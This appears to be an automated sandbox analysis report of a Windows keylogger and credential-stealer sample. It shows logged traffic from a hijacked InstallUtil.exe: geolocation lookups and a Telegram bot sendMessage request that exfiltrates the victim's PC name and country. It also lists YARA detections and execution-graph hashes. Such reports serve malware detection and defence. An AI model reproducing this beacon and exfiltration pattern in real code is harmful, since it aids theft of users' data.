                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2BwRcVqQLAVajnnkjy46KvZzZjGkFxow7NxPUEaU9yfmm0DJNNGGnLGTz0etmnHrMUUA43Uf5CenHgMpYupxUUvaNe%2FubKq5pM0Dw6J9oFNVkTFkyw7LU3nQKMx8Rb9iWy51rsbC"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a073ba73c358-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1618&rtt_var=618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1753753&cwnd=155&unsent_bytes=0&cid=cf8480db924d2956&ts=164&x=0"
                                                                                                             2025-01-11 05:50:00 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             5 | 192.168.2.7 | 49985 | 104.21.64.1 | 443 | 7612 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             2025-01-11 05:50:06 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                             2025-01-11 05:50:06 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:06 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889395
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lL72gYfm01hddye6wqLkEDxIbE5bhnAHxCcZ%2FcYdSCoc4WIkk%2FLO3eb74bsBa8GxqHqtMRz9fmtBbctepOsek6aaLDybYBhX07o0kR9nIu7aEF1UufN2RJQtCbdid%2B1H0dv0ML2x"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a09b8a5fde95-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1569&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1815920&cwnd=243&unsent_bytes=0&cid=4b271e96dd9af172&ts=131&x=0"
                                                                                                             2025-01-11 05:50:06 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             6 | 192.168.2.7 | 49987 | 104.21.64.1 | 443 | 7612 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             2025-01-11 05:50:24 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                             2025-01-11 05:50:24 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:24 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889413
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x50M5y7wup4Nb05aaOxhwgth8W3ThDRp7N3%2FonwPd9Q7JBAhTKrR52JuEC%2FBgQcqjovnKEYCVN%2FT2aNzfpqsyX5622SzKW52Lb36El%2B1NFJFRiOsdLzejaTNM%2BuweIB6%2F3vKzRgQ"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a1093c444414-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1659&rtt_var=637&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1696687&cwnd=180&unsent_bytes=0&cid=4539c2ebe9722b03&ts=177&x=0"
                                                                                                             2025-01-11 05:50:24 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             7 | 192.168.2.7 | 49989 | 104.21.64.1 | 443 | 7612 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             2025-01-11 05:50:28 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                             2025-01-11 05:50:29 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:29 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889418
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BXbdeonlAREAOUG9ymPyeltV2EeuRVyv%2Bm6ORnC7Cx49QDsABkRo9%2B2pUADhzRfc43N6VR7dYfPaSWCb2tdno%2ByyE%2Fkt4cL1GCXOJPgVlzsU7XH0Hnx1Cz%2B5ebsUmrWrURirVWDf"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a1274f4b7c6a-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1985&rtt_var=758&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1431372&cwnd=218&unsent_bytes=0&cid=d965e056f1cd87b6&ts=145&x=0"
                                                                                                             2025-01-11 05:50:29 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             8 | 192.168.2.7 | 49991 | 104.21.64.1 | 443 | 7612 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             2025-01-11 05:50:32 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                             2025-01-11 05:50:32 UTC | 858 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:32 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889421
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r0fMKlY7KyJD%2Fx8mktVb0LDAq6DpoLLYVI4bKmYHjpE%2BvbaD8J0DXzGNFWGR7BhIEi0JXMfCkGowbOVXyhUtWtfFd61I1s9KI%2BwQFaZnO3OLYD0EW%2FHx2M0QPOMrRvoqpSAZHNwR"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a13cc8a98ca1-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2369&min_rtt=1956&rtt_var=1029&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1492842&cwnd=168&unsent_bytes=0&cid=06139157d7fdcead&ts=147&x=0"
                                                                                                             2025-01-11 05:50:32 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             9 | 192.168.2.7 | 49992 | 149.154.167.220 | 443 | 7612 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             2025-01-11 05:50:33 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2012/01/2025%20/%2019:38:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                            Host: api.telegram.org
                                                                                                            Connection: Keep-Alive
                                                                                                             2025-01-11 05:50:33 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Sat, 11 Jan 2025 05:50:33 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 55
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                             2025-01-11 05:50:33 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



                                                                                                             Target ID: 1
                                                                                                             Start time: 00:49:00
                                                                                                             Start date: 11/01/2025
                                                                                                             Path: C:\Users\user\Desktop\sS7Jrsk0Z7.exe
                                                                                                             Wow64 process (32bit): true
                                                                                                             Commandline: "C:\Users\user\Desktop\sS7Jrsk0Z7.exe"
                                                                                                             Imagebase: 0xe60000
                                                                                                             File size: 832'320 bytes
                                                                                                             MD5 hash: 6DE308CE9B42F3CA44D87CD354DDE9AE
                                                                                                             Has elevated privileges: true
                                                                                                             Has administrator privileges: true
                                                                                                             Programmed in: C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.1806875709.0000000005070000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.1805361382.0000000003D18000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.1798101450.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:10
                                                                                                            Start time:00:49:20
                                                                                                            Start date:11/01/2025
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                            Imagebase:0x8a0000
                                                                                                            File size:42'064 bytes
                                                                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:19.2%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:4.1%
                                                                                                              Total number of Nodes:221
                                                                                                              Total number of Limit Nodes:11
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (oq$(oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                                              • API String ID: 0-746337618
                                                                                                              • Opcode ID: f9cf1b9773b2ca8caac624a44a3e6d85523caa057256960ef1997e5f4c198261
                                                                                                              • Instruction ID: c20252193247d71032050ba524059c88f63bef529d433b8671a4bdd315d502b8
                                                                                                              • Opcode Fuzzy Hash: f9cf1b9773b2ca8caac624a44a3e6d85523caa057256960ef1997e5f4c198261
                                                                                                              • Instruction Fuzzy Hash: B8825870A00209DFDB15CF68D984AEEBBFABF88310F15C59AE5859B2A1D730EC41CB54
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (oq$(oq$(oq$,q$,q$Hq
                                                                                                              • API String ID: 0-894188343
                                                                                                              • Opcode ID: 897928d746e2ae84c3641a7d7f9f78824d1ed9633e94ee6f3a82e6cdba98acea
                                                                                                              • Instruction ID: e475157169e2479fd4e781918965b99efa801d149dd988bb2f31b6d669dfdaf0
                                                                                                              • Opcode Fuzzy Hash: 897928d746e2ae84c3641a7d7f9f78824d1ed9633e94ee6f3a82e6cdba98acea
                                                                                                              • Instruction Fuzzy Hash: 1D724970A002098FDB15DF69D884AAEBBF6FFC8300F148469E955AB3A5DB34DD41CB50

                                                                                                              Control-flow Graph

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aee41f1e2bc2d5350dcd5da78d937db7729fccbbf47e1ac0eefc34b19a6b3a4c
                                                                                                              • Instruction ID: fc06424a4a48916f58e62965a3407f90af363ab0dbd1f4f496e002d49e0b5c66
                                                                                                              • Opcode Fuzzy Hash: aee41f1e2bc2d5350dcd5da78d937db7729fccbbf47e1ac0eefc34b19a6b3a4c
                                                                                                              • Instruction Fuzzy Hash: 31B3FC70A11628CFCB58EF78D98966CBBF2AF89300F4045E9D049A7764DE389D84CF56

                                                                                                              Control-flow Graph

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 26e5297fb308c38b524c322a7aeaf38a5fd4b9af296b9b46b8b1bf98df2ff417
                                                                                                              • Instruction ID: be7313bf008df26697b5868d28772815ad0c47ef4e7bc3f4c7a0b77f895b41a5
                                                                                                              • Opcode Fuzzy Hash: 26e5297fb308c38b524c322a7aeaf38a5fd4b9af296b9b46b8b1bf98df2ff417
                                                                                                              • Instruction Fuzzy Hash: C3B3FC70A11628CFCB58EF78D98966CBBF2AF89300F4045E9D049A7764DE389D84CF56

                                                                                                              Control-flow Graph

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810087104.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_76d0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9803396ab825fd829c6f15d8cdbfc6e8eb2355b5fd4df721754bc81aebc81448
                                                                                                              • Instruction ID: a4a3fda4cd956781fc6103c52ef42c0a25fe927201f768de3f79abee1383d478
                                                                                                              • Opcode Fuzzy Hash: 9803396ab825fd829c6f15d8cdbfc6e8eb2355b5fd4df721754bc81aebc81448
                                                                                                              • Instruction Fuzzy Hash: 5EB30570E152188BCB54EF79D99966CBBF2BF89300F0085E9D48AA3364DE389D85CF51

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: e\1$e\1$"*p$"*p
                                                                                                              • API String ID: 0-1513742261
                                                                                                              • Opcode ID: a34d2c8f9cc82d359e97241028fb01b296afb3e606c0fc380f657ac70f398202
                                                                                                              • Instruction ID: 457ce9a996d949f294d3ab5dfb9b90fd902c39e84eef3f7367f9fb1ca0d32c4c
                                                                                                              • Opcode Fuzzy Hash: a34d2c8f9cc82d359e97241028fb01b296afb3e606c0fc380f657ac70f398202
                                                                                                              • Instruction Fuzzy Hash: 748132B0D452288FDB14CFE5D9446EEBBF2BF89340F20942AD416BB214D7748A41CF98

                                                                                                               Control-flow Graph (legend: Executed / Not Executed)
                                                                                                               • Entry: block 5593 at 7983cba. Blocks with no successor: 5598 (7983c8d-7983c94), 5883 (798707d-7987096), 6226 (7987042-7987077). 37 basic blocks, 51 edges.
